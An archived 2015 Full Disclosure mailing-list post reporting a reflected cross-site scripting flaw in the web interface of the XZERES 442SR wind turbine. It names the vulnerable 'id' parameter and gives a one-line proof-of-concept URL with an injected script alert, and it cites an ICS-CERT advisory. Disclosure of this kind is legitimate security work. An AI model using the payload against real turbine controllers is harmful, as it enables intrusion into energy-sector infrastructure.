[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] XZERES 442SR Wind Turbine XSS
From: Karn Ganeshen <karnganeshen () gmail ! com>
Date: 2015-12-24 18:05:36
Message-ID: CAB8+WF3eM=M2hTowMB=p2mRoGe0qGTatgG2u99ZWsPOmj20yBg () mail ! gmail ! com
[Download RAW message or body]
XZERES 442SR Wind Turbine Cross-site Scripting Vulnerability
*AFFECTED PRODUCTS*
XZERES is a US-based energy company that maintains offices in several
countries around the world, including the UK, Italy, Japan, Vietnam,
Philippines, and Myanmar.
The affected product, 442SR Wind Turbine, has a web-based interface system.
According to XZERES, the 442SR is deployed across the Energy sector. XZERES
estimates that this product is used worldwide.
*Reference*
https://ics-cert.us-cert.gov/advisories/ICSA-15-342-01
*Vulnerable parameter*
id
*PoC*
http://<IP>/details?object=Inverter&id=2<script>alert(xss-id-parameter")
</script>
--
Best Regards,
Karn Ganeshen
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic